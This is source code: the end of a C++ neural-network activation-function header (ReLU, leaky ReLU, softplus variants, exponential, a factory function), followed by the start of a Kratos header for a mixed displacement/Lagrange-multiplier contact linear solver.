template <typename T> static T _evalDiff(const T in, const T out)
{
return in>0 ? 1 : 0;
}
static void _eval(const nnReal*const in, nnReal*const out, const Uint N)
{
#pragma omp simd aligned(in,out : VEC_WIDTH)
for (Uint i=0;i<N; ++i) out[i] = in[i]>0 ? in[i] : 0;
}
void eval(const nnReal*const in, nnReal*const out, const Uint N) const override
{
return _eval(in, out, N);
}
nnReal eval(const nnReal in) const override
{
return _eval(in);
}
nnReal inverse(const nnReal in) const override
{
assert(in>=0);
return in;
}
nnReal evalDiff(const nnReal in, const nnReal out) const override
{
return _evalDiff(in, out);
}
};
struct LRelu : public Function
{
std::string name() const override { return "LRelu";}
Real initFactor(const Uint inps, const Uint outs) const override
{
return std::sqrt(1.0/inps);
}
static Real _initFactor(const Uint inps, const Uint outs)
{
return std::sqrt(1.0/inps);
}
template <typename T> static T _eval(const T in)
{
return in>0 ? in : PRELU_FAC*in;
}
template <typename T> static T _evalDiff(const T in, const T out)
{
return in>0 ? 1 : PRELU_FAC;
}
static void _eval(const nnReal*const in, nnReal*const out, const Uint N)
{
#pragma omp simd aligned(in,out : VEC_WIDTH)
for (Uint i=0;i<N; ++i) out[i] = in[i]>0 ? in[i] : PRELU_FAC*in[i];
}
void eval(const nnReal*const in, nnReal*const out, const Uint N) const override
{
return _eval(in, out, N);
}
nnReal eval(const nnReal in) const override
{
return _eval(in);
}
nnReal inverse(const nnReal in) const override
{
if(in >= 0) return in;
else return in / PRELU_FAC;
}
nnReal evalDiff(const nnReal in, const nnReal out) const override
{
return _evalDiff(in, out);
}
};
struct ExpPlus : public Function
{
std::string name() const override { return "ExpPlus";}
Real initFactor(const Uint inps, const Uint outs) const override {
return std::sqrt(2./inps);
}
static Real _initFactor(const Uint inps, const Uint outs) {
return std::sqrt(2./inps);
}
template <typename T> static T _inv(const T in) {
return std::log(Utilities::safeExp(in) - 1);
}
  // std::exp readily overflows to inf/nan, so safeExp clips its argument
  // to keep the result between exp(-32) and exp(16).
template <typename T> static T _eval(const T in)
{
return std::log(1 + Utilities::safeExp(in));
}
template <typename T> static T _evalDiff(const T in)
{
return 1/(1 + Utilities::safeExp(-in));
}
template <typename T> static T _evalDiff(const T in, const T out)
{
return 1/(1 + Utilities::safeExp(-in));
}
static void _eval(const nnReal*const in, nnReal*const out, const Uint N)
{
for(Uint i=0; i<N; ++i) out[i] = _eval(in[i]);
}
void eval(const nnReal*const in, nnReal*const out, const Uint N) const override
{
return _eval(in, out, N);
}
nnReal eval(const nnReal in) const override
{
return _eval(in);
}
nnReal inverse(const nnReal in) const override
{
return _inv(in);
}
nnReal evalDiff(const nnReal in, const nnReal out) const override
{
return _evalDiff(in, out);
}
};
struct SoftPlus : public Function
{
std::string name() const override { return "SoftPlus";}
Real initFactor(const Uint inps, const Uint outs) const override
{
return std::sqrt(2./inps);
}
static Real _initFactor(const Uint inps, const Uint outs)
{
return std::sqrt(2./inps);
}
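  // Note: this "SoftPlus" is the algebraic smooth rectifier
  // f(x) = (x + sqrt(1+x^2))/2; it shares the asymptotes of log(1+e^x)
  // (0 as x -> -inf, x as x -> +inf) but needs no exponential.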
template <typename T> static T _eval(const T in)
{
return (in + std::sqrt(1+in*in)) / 2;
}
template <typename T> static T _evalDiff(const T in)
{
return (1 + in/std::sqrt(1+in*in)) / 2;
}
template <typename T> static T _evalDiff(const T in, const T out)
{
return (1 + in/std::sqrt(1+in*in)) / 2;
}
template <typename T> static T _inv(const T in)
{
assert(in > 0);
return (in*in - (T)0.25)/in;
}
static void _eval(const nnReal*const in, nnReal*const out, const Uint N)
{
#pragma omp simd aligned(in,out : VEC_WIDTH)
for (Uint i=0;i<N; ++i) out[i] = (in[i] + std::sqrt(1+in[i]*in[i])) / 2;
}
void eval(const nnReal*const in, nnReal*const out, const Uint N) const override
{
return _eval(in, out, N);
}
nnReal eval(const nnReal in) const override { return _eval(in); }
nnReal inverse(const nnReal in) const override { return _inv(in); }
nnReal evalDiff(const nnReal in, const nnReal out) const override
{
return _evalDiff(in, out);
}
};
struct Exp : public Function
{
std::string name() const override { return "Exp";}
Real initFactor(const Uint inps, const Uint outs) const override
{
return std::sqrt(2./inps);
}
static Real _initFactor(const Uint inps, const Uint outs)
{
return std::sqrt(2./inps);
}
template <typename T> static T _inv(const T in)
{
return std::log(in);
}
template <typename T> static T _eval(const T in)
{
return Utilities::nnSafeExp(in);
}
template <typename T> static T _evalDiff(const T in)
{
return Utilities::nnSafeExp(in);
}
template <typename T> static T _evalDiff(const T in, const T out)
{
return out;
}
static void _eval(const nnReal*const in, nnReal*const out, const Uint N)
{
for(Uint i=0; i<N; ++i) out[i] = Utilities::nnSafeExp(in[i]);
}
void eval(const nnReal*const in, nnReal*const out, const Uint N) const override
{
return _eval(in, out, N);
}
nnReal eval(const nnReal in) const override
{
return _eval(in);
}
nnReal inverse(const nnReal in) const override
{
assert(in > 0);
return std::log(in);
}
nnReal evalDiff(const nnReal in, const nnReal out) const override
{
return _evalDiff(in, out);
}
};
inline std::unique_ptr<Function> makeFunction(const std::string name,
const bool bOutput=false)
{
if (bOutput || name == "Linear") return std::make_unique<Linear>();
else
if (name == "Tanh") return std::make_unique<Tanh>();
else
if (name == "Sigm") return std::make_unique<Sigm>();
else
if (name == "HardSign") return std::make_unique<HardSign>();
else
if (name == "SoftSign") return std::make_unique<SoftSign>();
else
if (name == "Relu") return std::make_unique<Relu>();
else
if (name == "LRelu") return std::make_unique<LRelu>();
else
if (name == "ExpPlus") return std::make_unique<ExpPlus>();
else
if (name == "SoftPlus") return std::make_unique<SoftPlus>();
else
if (name == "Exp") return std::make_unique<Exp>();
else
die("Activation function not recognized");
return std::make_unique<Linear>();
}
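/* Usage sketch (illustrative, not part of the original smarties API surface):
   construct an activation by name and evaluate it and its derivative.

     std::unique_ptr<Function> f = makeFunction("Tanh");
     const nnReal y  = f->eval((nnReal) 0.5);        // tanh(0.5)
     const nnReal dy = f->evalDiff((nnReal) 0.5, y); // 1 - y*y
     const nnReal x  = f->inverse(y);                // recovers 0.5
*/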
} // end namespace smarties
#endif // smarties_Function_h
|
mixedulm_linear_solver.h | // KRATOS ______ __ __ _____ __ __ __
// / ____/___ ____ / /_____ ______/ /_/ ___// /________ _______/ /___ ___________ _/ /
// / / / __ \/ __ \/ __/ __ `/ ___/ __/\__ \/ __/ ___/ / / / ___/ __/ / / / ___/ __ `/ /
// / /___/ /_/ / / / / /_/ /_/ / /__/ /_ ___/ / /_/ / / /_/ / /__/ /_/ /_/ / / / /_/ / /
// \____/\____/_/ /_/\__/\__,_/\___/\__//____/\__/_/ \__,_/\___/\__/\__,_/_/ \__,_/_/ MECHANICS
//
// License: BSD License
// license: ContactStructuralMechanicsApplication/license.txt
//
// Main authors: Vicente Mataix Ferrandiz
//
#if !defined(KRATOS_MIXEDULM_SOLVER_H_INCLUDED )
#define KRATOS_MIXEDULM_SOLVER_H_INCLUDED
// System includes
#include <string>
#include <iostream>
#include <sstream>
#include <cstddef>
// External includes
// Project includes
#include "includes/define.h"
#include "includes/model_part.h"
#include "linear_solvers/reorderer.h"
#include "linear_solvers/iterative_solver.h"
#include "utilities/openmp_utils.h"
#include "contact_structural_mechanics_application_variables.h"
#include "utilities/sparse_matrix_multiplication_utility.h"
#include "custom_utilities/logging_settings.hpp"
namespace Kratos
{
///@name Kratos Globals
///@{
///@}
///@name Type Definitions
///@{
///@}
///@name Enum's
///@{
///@}
///@name Functions
///@{
///@}
///@name Kratos Classes
///@{
/**
* @class MixedULMLinearSolver
* @ingroup ContactStructuralMechanicsApplication
 * @brief This solver is designed for the solution of mixed U-LM problems (it is optimized in particular for dual LM, whose diagonal LM block avoids an expensive resolution of that block).
 * @details It uses a block structure dividing the matrix into UU, ULM, LMU and LMLM blocks,
 * and uses "standard" linear solvers for the different blocks as well as a GMRES for the outer part
* @author Vicente Mataix Ferrandiz
*/
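/* Block structure assumed by this solver (sketch, following the class
   documentation above):
       | K_uu    K_uLM | | u  |   | f_u  |
       | K_LMu   D     | | LM | = | f_LM |
   With dual LM the block D is diagonal, so once u has been obtained from the
   condensed displacement system, LM follows cheaply as D^{-1}(f_LM - K_LMu u). */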
template<class TSparseSpaceType, class TDenseSpaceType,
class TPreconditionerType = Preconditioner<TSparseSpaceType, TDenseSpaceType>,
class TReordererType = Reorderer<TSparseSpaceType, TDenseSpaceType> >
class MixedULMLinearSolver :
public IterativeSolver<TSparseSpaceType, TDenseSpaceType,TPreconditionerType, TReordererType>
{
public:
///@}
///@name Enums
///@{
    /// This enum is used to identify the kind of each index
enum class BlockType {
OTHER,
MASTER,
SLAVE_INACTIVE,
SLAVE_ACTIVE,
LM_INACTIVE,
LM_ACTIVE
};
///@name Type Definitions
///@{
/// The flag that indicates if the blocks are allocated
KRATOS_DEFINE_LOCAL_FLAG( BLOCKS_ARE_ALLOCATED );
/// The flag that indicates if the solution is initialized
KRATOS_DEFINE_LOCAL_FLAG( IS_INITIALIZED );
/// Pointer definition of MixedULMLinearSolver
KRATOS_CLASS_POINTER_DEFINITION (MixedULMLinearSolver);
    /// The base class corresponds to an iterative solver
typedef IterativeSolver<TSparseSpaceType, TDenseSpaceType, TPreconditionerType, TReordererType> BaseType;
/// The base class for the linear solver
typedef LinearSolver<TSparseSpaceType, TDenseSpaceType, TReordererType> LinearSolverType;
/// The pointer to a linear solver
typedef typename LinearSolverType::Pointer LinearSolverPointerType;
/// The sparse matrix type
typedef typename TSparseSpaceType::MatrixType SparseMatrixType;
/// The vector type
typedef typename TSparseSpaceType::VectorType VectorType;
/// The dense matrix type
typedef typename TDenseSpaceType::MatrixType DenseMatrixType;
/// The dense vector type
typedef typename TDenseSpaceType::VectorType DenseVectorType;
/// The node type
typedef Node<3> NodeType;
/// The definition of the dof type
typedef typename ModelPart::DofType DofType;
/// The array containing the dofs
typedef typename ModelPart::DofsArrayType DofsArrayType;
/// An array of conditions
typedef ModelPart::ConditionsContainerType ConditionsArrayType;
/// An array of nodes
typedef ModelPart::NodesContainerType NodesArrayType;
/// The size type
typedef std::size_t SizeType;
/// The index type
typedef std::size_t IndexType;
/// A vector of indexes
typedef DenseVector<IndexType> IndexVectorType;
/// A vector of types
typedef DenseVector<BlockType> BlockTypeVectorType;
static constexpr double ZeroTolerance = std::numeric_limits<double>::epsilon();
///@}
///@name Life Cycle
///@{
/**
* @brief Default constructor
* @param pSolverDispBlock The linear solver used for the displacement block
     * @param MaxTolerance The maximal tolerance considered
* @param MaxIterationNumber The maximal number of iterations
*/
MixedULMLinearSolver (
LinearSolverPointerType pSolverDispBlock,
const double MaxTolerance,
const std::size_t MaxIterationNumber
) : BaseType (MaxTolerance, MaxIterationNumber),
mpSolverDispBlock(pSolverDispBlock)
{
// Initializing the remaining variables
mOptions.Set(BLOCKS_ARE_ALLOCATED, false);
mOptions.Set(IS_INITIALIZED, false);
}
/**
* @brief Second constructor, it uses a Kratos parameters as input instead of direct input
* @param pSolverDispBlock The linear solver used for the displacement block
* @param ThisParameters The configuration parameters considered
*/
MixedULMLinearSolver(
LinearSolverPointerType pSolverDispBlock,
Parameters ThisParameters = Parameters(R"({})")
): BaseType (),
mpSolverDispBlock(pSolverDispBlock)
{
KRATOS_TRY
        // Now validate against defaults -- this also ensures no type mismatch
Parameters default_parameters = GetDefaultParameters();
ThisParameters.ValidateAndAssignDefaults(default_parameters);
// Initializing the remaining variables
this->SetTolerance( ThisParameters["tolerance"].GetDouble() );
this->SetMaxIterationsNumber( ThisParameters["max_iteration_number"].GetInt() );
mEchoLevel = ThisParameters["echo_level"].GetInt();
mOptions.Set(BLOCKS_ARE_ALLOCATED, false);
mOptions.Set(IS_INITIALIZED, false);
KRATOS_CATCH("")
}
/// Copy constructor.
MixedULMLinearSolver (const MixedULMLinearSolver& rOther)
: BaseType(rOther),
mpSolverDispBlock(rOther.mpSolverDispBlock),
mOptions(rOther.mOptions),
mMasterIndices(rOther.mMasterIndices),
mSlaveInactiveIndices(rOther.mSlaveInactiveIndices),
mSlaveActiveIndices(rOther.mSlaveActiveIndices),
mLMInactiveIndices(rOther.mLMInactiveIndices),
mLMActiveIndices(rOther.mLMActiveIndices),
mOtherIndices(rOther.mOtherIndices),
mGlobalToLocalIndexing(rOther.mGlobalToLocalIndexing),
mWhichBlockType(rOther.mWhichBlockType),
mKDispModified(rOther.mKDispModified),
mKLMAModified(rOther.mKLMAModified),
mKLMIModified(rOther.mKLMIModified),
mKSAN(rOther.mKSAN),
mKSAM(rOther.mKSAM),
mKSASI(rOther.mKSASI),
mKSASA(rOther.mKSASA),
mPOperator(rOther.mPOperator),
mCOperator(rOther.mCOperator),
mResidualLMActive(rOther.mResidualLMActive),
mResidualLMInactive(rOther.mResidualLMInactive),
mResidualDisp(rOther.mResidualDisp),
mLMActive(rOther.mLMActive),
mLMInactive(rOther.mLMInactive),
mDisp(rOther.mDisp),
mEchoLevel(rOther.mEchoLevel),
mFileCreated(rOther.mFileCreated)
{
}
/// Destructor.
~MixedULMLinearSolver() override {}
///@}
///@name Operators
///@{
/// Assignment operator.
MixedULMLinearSolver& operator= (const MixedULMLinearSolver& Other)
{
return *this;
}
///@}
///@name Operations
///@{
/**
* @brief This function is designed to be called as few times as possible. It creates the data structures
* that only depend on the connectivity of the matrix (and not on its coefficients)
* @details So that the memory can be allocated once and expensive operations can be done only when strictly
* needed
* @param rA System matrix
* @param rX Solution vector. it's also the initial guess for iterative linear solvers.
* @param rB Right hand side vector.
*/
void Initialize (
SparseMatrixType& rA,
VectorType& rX,
VectorType& rB
) override
{
if (mOptions.Is(BLOCKS_ARE_ALLOCATED)) {
mpSolverDispBlock->Initialize(mKDispModified, mDisp, mResidualDisp);
mOptions.Set(IS_INITIALIZED, true);
} else
            KRATOS_DETAIL("MixedULM Initialize") << "Linear solver initialization is deferred to the moment at which the blocks are available" << std::endl;
}
/**
* @brief This function is designed to be called every time the coefficients change in the system
* that is, normally at the beginning of each solve.
* @details For example if we are implementing a direct solver, this is the place to do the factorization
* so that then the backward substitution can be performed effectively more than once
* @param rA System matrix
* @param rX Solution vector. it's also the initial guess for iterative linear solvers.
* @param rB Right hand side vector.
*/
void InitializeSolutionStep (
SparseMatrixType& rA,
VectorType& rX,
VectorType& rB
) override
{
        // Copy to local matrices (allocate the blocks on the first call only)
        FillBlockMatrices (mOptions.IsNot(BLOCKS_ARE_ALLOCATED), rA, rX, rB);
        mOptions.Set(BLOCKS_ARE_ALLOCATED, true);
if(mOptions.IsNot(IS_INITIALIZED))
this->Initialize(rA,rX,rB);
mpSolverDispBlock->InitializeSolutionStep(mKDispModified, mDisp, mResidualDisp);
}
/**
* @brief This function actually performs the solution work, eventually taking advantage of what was done before in the
* @details Initialize and InitializeSolutionStep functions.
* @param rA System matrix
* @param rX Solution vector. it's also the initial guess for iterative linear solvers.
* @param rB Right hand side vector.
*/
void PerformSolutionStep (
SparseMatrixType& rA,
VectorType& rX,
VectorType& rB
) override
{
        // Auxiliary sizes
const SizeType lm_active_size = mLMActiveIndices.size();
const SizeType lm_inactive_size = mLMInactiveIndices.size();
const SizeType total_disp_size = mOtherIndices.size() + mMasterIndices.size() + mSlaveInactiveIndices.size() + mSlaveActiveIndices.size();
// Get the u and lm residuals
GetUPart (rB, mResidualDisp);
// Solve u block
if (mDisp.size() != total_disp_size)
mDisp.resize(total_disp_size, false);
mpSolverDispBlock->Solve (mKDispModified, mDisp, mResidualDisp);
// Write back solution
SetUPart(rX, mDisp);
// Solve LM
if (lm_active_size > 0) {
// Now we compute the residual of the LM
GetLMAPart (rB, mResidualLMActive);
            // LM = D⁻¹ * rLM
if (mLMActive.size() != lm_active_size)
mLMActive.resize(lm_active_size, false);
TSparseSpaceType::Mult (mKLMAModified, mResidualLMActive, mLMActive);
// Write back solution
SetLMAPart(rX, mLMActive);
}
if (lm_inactive_size > 0) {
// Now we compute the residual of the LM
GetLMIPart (rB, mResidualLMInactive);
            // LM = D⁻¹ * rLM
if (mLMInactive.size() != lm_inactive_size)
mLMInactive.resize(lm_inactive_size, false);
TSparseSpaceType::Mult (mKLMIModified, mResidualLMInactive, mLMInactive);
// Write back solution
SetLMIPart(rX, mLMInactive);
}
}
/**
* @brief This function is designed to be called at the end of the solve step.
* @details For example this is the place to remove any data that we do not want to save for later
* @param rA System matrix
* @param rX Solution vector. it's also the initial guess for iterative linear solvers.
* @param rB Right hand side vector.
*/
void FinalizeSolutionStep (
SparseMatrixType& rA,
VectorType& rX,
VectorType& rB
) override
{
mpSolverDispBlock->FinalizeSolutionStep(mKDispModified, mDisp, mResidualDisp);
}
/**
* @brief This function is designed to clean up all internal data in the solver.
* @details Clear is designed to leave the solver object as if newly created. After a clear a new Initialize is needed
*/
void Clear() override
{
mOptions.Set(BLOCKS_ARE_ALLOCATED, false);
mpSolverDispBlock->Clear();
        // We clear the matrices and vectors
mKDispModified.clear(); /// The modified displacement block
mKLMAModified.clear(); /// The modified active LM block (diagonal)
        mKLMIModified.clear(); /// The modified inactive LM block (diagonal)
mKSAN.clear(); /// The slave active-displacement block
mKSAM.clear(); /// The active slave-master block
mKSASI.clear(); /// The active slave-inactive slave block
mKSASA.clear(); /// The active slave-slave active block
mPOperator.clear(); /// The operator used for the master blocks
mCOperator.clear(); /// The operator used for the active slave block
mResidualLMActive.clear(); /// The residual corresponding the active LM
mResidualLMInactive.clear(); /// The residual corresponding the inactive LM
mResidualDisp.clear(); /// The residual of the displacements
mLMActive.clear(); /// The solution of the active LM
mLMInactive.clear(); /// The solution of the inactive LM
mDisp.clear(); /// The solution of the displacement
mOptions.Set(IS_INITIALIZED, false);
}
/**
* @brief Normal solve method.
     * @details Solves the linear system Ax=b and puts the result in SystemVector& rX, which is also the initial guess for iterative methods.
* @param rA System matrix
* @param rX Solution vector. it's also the initial guess for iterative linear solvers.
* @param rB Right hand side vector.
*/
bool Solve(
SparseMatrixType& rA,
VectorType& rX,
VectorType& rB
) override
{
// We print the system before condensate (if needed)
if (mEchoLevel == 2) { //if it is needed to print the debug info
KRATOS_INFO("RHS BEFORE CONDENSATION") << "RHS = " << rB << std::endl;
} else if (mEchoLevel == 3) { //if it is needed to print the debug info
KRATOS_INFO("LHS BEFORE CONDENSATION") << "SystemMatrix = " << rA << std::endl;
KRATOS_INFO("RHS BEFORE CONDENSATION") << "RHS = " << rB << std::endl;
} else if (mEchoLevel >= 4) { //print to matrix market file
const std::string matrix_market_name = "before_condensation_A_" + std::to_string(mFileCreated) + ".mm";
TSparseSpaceType::WriteMatrixMarketMatrix(matrix_market_name.c_str(), rA, false);
const std::string matrix_market_vectname = "before_condensation_b_" + std::to_string(mFileCreated) + ".mm.rhs";
TSparseSpaceType::WriteMatrixMarketVector(matrix_market_vectname.c_str(), rB);
}
if (mOptions.IsNot(IS_INITIALIZED))
this->Initialize (rA,rX,rB);
this->InitializeSolutionStep (rA,rX,rB);
this->PerformSolutionStep (rA,rX,rB);
this->FinalizeSolutionStep (rA,rX,rB);
// We print the resulting system (if needed)
if (mEchoLevel == 2) { //if it is needed to print the debug info
KRATOS_INFO("Dx") << "Solution obtained = " << mDisp << std::endl;
KRATOS_INFO("RHS") << "RHS = " << mResidualDisp << std::endl;
} else if (mEchoLevel == 3) { //if it is needed to print the debug info
KRATOS_INFO("LHS") << "SystemMatrix = " << mKDispModified << std::endl;
KRATOS_INFO("Dx") << "Solution obtained = " << mDisp << std::endl;
KRATOS_INFO("RHS") << "RHS = " << mResidualDisp << std::endl;
} else if (mEchoLevel >= 4) { //print to matrix market file
const std::string matrix_market_name = "A_" + std::to_string(mFileCreated) + ".mm";
TSparseSpaceType::WriteMatrixMarketMatrix(matrix_market_name.c_str(), mKDispModified, false);
const std::string matrix_market_vectname = "b_" + std::to_string(mFileCreated) + ".mm.rhs";
TSparseSpaceType::WriteMatrixMarketVector(matrix_market_vectname.c_str(), mResidualDisp);
mFileCreated++;
}
return false;
}
/**
* @brief Multi solve method for solving a set of linear systems with same coefficient matrix.
     * @details Solves the linear system Ax=b and puts the result in SystemVector& rX, which is also the initial guess for iterative methods.
* @param rA System matrix
* @param rX Solution vector. it's also the initial guess for iterative linear solvers.
* @param rB Right hand side vector.
*/
bool Solve (
SparseMatrixType& rA,
DenseMatrixType& rX,
DenseMatrixType& rB
) override
{
return false;
}
/**
* @brief Some solvers may require a minimum degree of knowledge of the structure of the matrix. To make an example
* when solving a mixed u-p problem, it is important to identify the row associated to v and p.
* @details Another example is the automatic prescription of rotation null-space for smoothed-aggregation solvers
* which require knowledge on the spatial position of the nodes associated to a given dof.
* This function tells if the solver requires such data
*/
bool AdditionalPhysicalDataIsNeeded() override
{
return true;
}
/**
* @brief Some solvers may require a minimum degree of knowledge of the structure of the matrix.
* @details To make an example when solving a mixed u-p problem, it is important to identify the row associated to v and p. Another example is the automatic prescription of rotation null-space for smoothed-aggregation solvers which require knowledge on the spatial position of the nodes associated to a given dof. This function is the place to eventually provide such data
* @param rA System matrix
* @param rX Solution vector. It's also the initial guess for iterative linear solvers.
* @param rB Right hand side vector.
*/
void ProvideAdditionalData (
SparseMatrixType& rA,
VectorType& rX,
VectorType& rB,
DofsArrayType& rDofSet,
ModelPart& rModelPart
) override
{
        // Auxiliary parameters
IndexType node_id;
// Count LM dofs
SizeType n_lm_inactive_dofs = 0, n_lm_active_dofs = 0;
SizeType n_master_dofs = 0;
SizeType n_slave_inactive_dofs = 0, n_slave_active_dofs = 0;
SizeType tot_active_dofs = 0;
// We separate if we consider a block builder and solver or an elimination builder and solver
if (rModelPart.IsNot(TO_SPLIT)) {
// In case of block builder and solver
for (auto& i_dof : rDofSet) {
node_id = i_dof.Id();
const NodeType& node = rModelPart.GetNode(node_id);
if (i_dof.EquationId() < rA.size1()) {
tot_active_dofs++;
if (IsLMDof(i_dof)) {
if (node.Is(ACTIVE))
n_lm_active_dofs++;
else
n_lm_inactive_dofs++;
} else if (node.Is(INTERFACE) && IsDisplacementDof(i_dof)) {
if (node.Is(MASTER)) {
n_master_dofs++;
} else if (node.Is(SLAVE)) {
if (node.Is(ACTIVE))
n_slave_active_dofs++;
else
n_slave_inactive_dofs++;
}
}
}
}
} else {
// In case of elimination builder and solver
for (auto& i_dof : rDofSet) {
node_id = i_dof.Id();
const NodeType& node = rModelPart.GetNode(node_id);
tot_active_dofs++;
if (IsLMDof(i_dof)) {
if (node.Is(ACTIVE))
n_lm_active_dofs++;
else
n_lm_inactive_dofs++;
} else if (node.Is(INTERFACE) && IsDisplacementDof(i_dof)) {
if (node.Is(MASTER)) {
n_master_dofs++;
} else if (node.Is(SLAVE)) {
if (node.Is(ACTIVE))
n_slave_active_dofs++;
else
n_slave_inactive_dofs++;
}
}
}
}
KRATOS_ERROR_IF(tot_active_dofs != rA.size1()) << "Total system size does not coincide with the free dof map: " << tot_active_dofs << " vs " << rA.size1() << std::endl;
// Resize arrays as needed
if (mMasterIndices.size() != n_master_dofs)
mMasterIndices.resize (n_master_dofs,false);
if (mSlaveInactiveIndices.size() != n_slave_inactive_dofs)
mSlaveInactiveIndices.resize (n_slave_inactive_dofs,false);
if (mSlaveActiveIndices.size() != n_slave_active_dofs)
mSlaveActiveIndices.resize (n_slave_active_dofs,false);
if (mLMInactiveIndices.size() != n_lm_inactive_dofs)
mLMInactiveIndices.resize (n_lm_inactive_dofs,false);
if (mLMActiveIndices.size() != n_lm_active_dofs)
mLMActiveIndices.resize (n_lm_active_dofs,false);
const SizeType n_other_dofs = tot_active_dofs - n_lm_inactive_dofs - n_lm_active_dofs - n_master_dofs - n_slave_inactive_dofs - n_slave_active_dofs;
if (mOtherIndices.size() != n_other_dofs)
mOtherIndices.resize (n_other_dofs, false);
if (mGlobalToLocalIndexing.size() != tot_active_dofs)
mGlobalToLocalIndexing.resize (tot_active_dofs,false);
if (mWhichBlockType.size() != tot_active_dofs)
mWhichBlockType.resize(tot_active_dofs, false);
// Size check
KRATOS_ERROR_IF_NOT(n_lm_active_dofs == n_slave_active_dofs) << "The number of active LM dofs: " << n_lm_active_dofs << " and active slave nodes dofs: " << n_slave_active_dofs << " does not coincide" << std::endl;
        /**
         * Construct the auxiliary index lists:
         * "mOtherIndices[i]" will contain the position in the global system of the i-th NON-LM dof
         * "mLMActiveIndices[i]" will contain the position in the global system of the i-th active LM dof
         * "mGlobalToLocalIndexing[i]" will contain the position of global dof i within its local block
         */
SizeType lm_inactive_counter = 0, lm_active_counter = 0;
SizeType master_counter = 0;
SizeType slave_inactive_counter = 0, slave_active_counter = 0;
SizeType other_counter = 0;
IndexType global_pos = 0;
// We separate if we consider a block builder and solver or an elimination builder and solver
if (rModelPart.IsNot(TO_SPLIT)) {
// In case of block builder and solver
for (auto& i_dof : rDofSet) {
node_id = i_dof.Id();
const NodeType& r_node = rModelPart.GetNode(node_id);
if (i_dof.EquationId() < rA.size1()) {
if (IsLMDof(i_dof)) {
if (r_node.Is(ACTIVE)) {
mLMActiveIndices[lm_active_counter] = global_pos;
mGlobalToLocalIndexing[global_pos] = lm_active_counter;
mWhichBlockType[global_pos] = BlockType::LM_ACTIVE;
++lm_active_counter;
} else {
mLMInactiveIndices[lm_inactive_counter] = global_pos;
mGlobalToLocalIndexing[global_pos] = lm_inactive_counter;
mWhichBlockType[global_pos] = BlockType::LM_INACTIVE;
++lm_inactive_counter;
}
} else if ( r_node.Is(INTERFACE) && IsDisplacementDof(i_dof)) {
if (r_node.Is(MASTER)) {
mMasterIndices[master_counter] = global_pos;
mGlobalToLocalIndexing[global_pos] = master_counter;
mWhichBlockType[global_pos] = BlockType::MASTER;
++master_counter;
} else if (r_node.Is(SLAVE)) {
if (r_node.Is(ACTIVE)) {
mSlaveActiveIndices[slave_active_counter] = global_pos;
mGlobalToLocalIndexing[global_pos] = slave_active_counter;
mWhichBlockType[global_pos] = BlockType::SLAVE_ACTIVE;
++slave_active_counter;
} else {
mSlaveInactiveIndices[slave_inactive_counter] = global_pos;
mGlobalToLocalIndexing[global_pos] = slave_inactive_counter;
mWhichBlockType[global_pos] = BlockType::SLAVE_INACTIVE;
++slave_inactive_counter;
}
} else { // We need to consider always an else to ensure that the system size is consistent
mOtherIndices[other_counter] = global_pos;
mGlobalToLocalIndexing[global_pos] = other_counter;
mWhichBlockType[global_pos] = BlockType::OTHER;
++other_counter;
}
} else {
mOtherIndices[other_counter] = global_pos;
mGlobalToLocalIndexing[global_pos] = other_counter;
mWhichBlockType[global_pos] = BlockType::OTHER;
++other_counter;
}
++global_pos;
}
}
} else {
// In case of elimination builder and solver
for (auto& i_dof : rDofSet) {
node_id = i_dof.Id();
const NodeType& r_node = rModelPart.GetNode(node_id);
if (IsLMDof(i_dof)) {
if (r_node.Is(ACTIVE)) {
mLMActiveIndices[lm_active_counter] = global_pos;
mGlobalToLocalIndexing[global_pos] = lm_active_counter;
mWhichBlockType[global_pos] = BlockType::LM_ACTIVE;
++lm_active_counter;
} else {
mLMInactiveIndices[lm_inactive_counter] = global_pos;
mGlobalToLocalIndexing[global_pos] = lm_inactive_counter;
mWhichBlockType[global_pos] = BlockType::LM_INACTIVE;
++lm_inactive_counter;
}
} else if ( r_node.Is(INTERFACE) && IsDisplacementDof(i_dof)) {
if (r_node.Is(MASTER)) {
mMasterIndices[master_counter] = global_pos;
mGlobalToLocalIndexing[global_pos] = master_counter;
mWhichBlockType[global_pos] = BlockType::MASTER;
++master_counter;
} else if (r_node.Is(SLAVE)) {
if (r_node.Is(ACTIVE)) {
mSlaveActiveIndices[slave_active_counter] = global_pos;
mGlobalToLocalIndexing[global_pos] = slave_active_counter;
mWhichBlockType[global_pos] = BlockType::SLAVE_ACTIVE;
++slave_active_counter;
} else {
mSlaveInactiveIndices[slave_inactive_counter] = global_pos;
mGlobalToLocalIndexing[global_pos] = slave_inactive_counter;
mWhichBlockType[global_pos] = BlockType::SLAVE_INACTIVE;
++slave_inactive_counter;
}
} else { // We always need an else branch to ensure that the system size stays consistent
mOtherIndices[other_counter] = global_pos;
mGlobalToLocalIndexing[global_pos] = other_counter;
mWhichBlockType[global_pos] = BlockType::OTHER;
++other_counter;
}
} else {
mOtherIndices[other_counter] = global_pos;
mGlobalToLocalIndexing[global_pos] = other_counter;
mWhichBlockType[global_pos] = BlockType::OTHER;
++other_counter;
}
++global_pos;
}
}
KRATOS_DEBUG_ERROR_IF(master_counter != n_master_dofs) << "The master dofs counter: " << master_counter << " does not coincide with the expected: " << n_master_dofs << std::endl;
KRATOS_DEBUG_ERROR_IF(slave_active_counter != n_slave_active_dofs) << "The active slave dofs counter: " << slave_active_counter << " does not coincide with the expected: " << n_slave_active_dofs << std::endl;
KRATOS_DEBUG_ERROR_IF(slave_inactive_counter != n_slave_inactive_dofs) << "The inactive slave dofs counter: " << slave_inactive_counter << " does not coincide with the expected: " << n_slave_inactive_dofs << std::endl;
KRATOS_DEBUG_ERROR_IF(lm_active_counter != n_lm_active_dofs) << "The active LM dofs counter: " << lm_active_counter << " does not coincide with the expected: " << n_lm_active_dofs << std::endl;
KRATOS_DEBUG_ERROR_IF(lm_inactive_counter != n_lm_inactive_dofs) << "The inactive LM dofs counter: " << lm_inactive_counter << " does not coincide with the expected: " << n_lm_inactive_dofs << std::endl;
KRATOS_DEBUG_ERROR_IF(other_counter != n_other_dofs) << "The other dofs counter: " << other_counter << " does not coincide with the expected: " << n_other_dofs << std::endl;
}
///@}
///@name Access
///@{
///@}
///@name Inquiry
///@{
///@}
///@name Input and output
///@{
/// Turn back information as a string.
std::string Info() const override
{
return "Mixed displacement LM linear solver";
}
/// Print information about this object.
void PrintInfo (std::ostream& rOStream) const override
{
rOStream << "Mixed displacement LM linear solver";
}
/// Print object's data.
void PrintData (std::ostream& rOStream) const override
{
}
///@}
///@name Friends
///@{
///@}
protected:
///@name Protected static Member Variables
///@{
///@}
///@name Protected member Variables
///@{
///@}
///@name Protected Operators
///@{
///@}
